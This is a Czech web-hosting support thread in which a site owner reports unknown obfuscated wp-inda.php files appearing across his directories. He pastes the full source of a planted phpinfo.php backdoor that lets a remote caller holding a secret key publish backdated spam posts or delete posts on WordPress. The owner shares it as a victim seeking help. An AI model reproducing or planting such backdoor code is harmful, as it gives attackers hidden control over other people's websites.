soubor wp-inda.php
Dobrý den,
ve všech adresářích na specialne.cz se začal objevovat soubor wp-inda.php
Obfuscation provided by Unknowndevice64 – Free Online PHP Obfuscator
http://www.ud64.com/
Tak se chci optat, zda je to v pořádku? Tento soubor jsem určitě nenahrával. Děkuji za informaci, přeji hezký den. Radek
3 Odpověď
Dobrý den,
určitě na webhostingu nepoužívám WordPress, navíc se soubor nacházel na všech subdomenách a v každém adresaři, provedl jsem vymaz nepotřebných subdomen a prošel jsem všechny složky a smazal jsem tedy wp-inda.php, narazil jsem i na podivný soubor phpinfo.php, tak vám projistotu posílám obsah:
„phpinfo.php“
<?php
if(md5(@$_GET[„api_key“]) != ‚f2745b0fbeb79404967de8381fefb0a0‘)
{
exit();
}
include „wp-load.php“;
if(@$_POST[„proc“] == „new_post“)
{
$categories = get_categories();
$category_id = $categories[1]->term_id;
$postdate = ‚2010-02-23 18:57:33‘;
$my_post = array(
‚post_title‘ => wp_strip_all_tags(base64_decode(@$_POST[‚post_title‘])),
‚post_content‘ => stripslashes(@$_POST[‚post_content‘]),
‚post_status‘ => ‚publish‘,
‚post_author‘ => 1,
‚post_date‘ => $postdate,
‚post_category‘ => array($category_id)
);
$post_id = wp_insert_post($my_post);
if($post_id)
{
echo $post_id;
}
}elseif(@$_POST[„proc“] == „delete_post“){
if(wp_delete_post($_POST[„post_id“], true))
{
echo ‚success‘;
}
}elseif(@$_POST[„proc“] == „check“)
{
echo ‚success‘;
}
„konec souboru phpinfo.php“
Budu tedy sledovat, zda se tyto aktivity budou znovu opakovat a když tak bych se ozval, děkuji za info a přeji hezký den Radek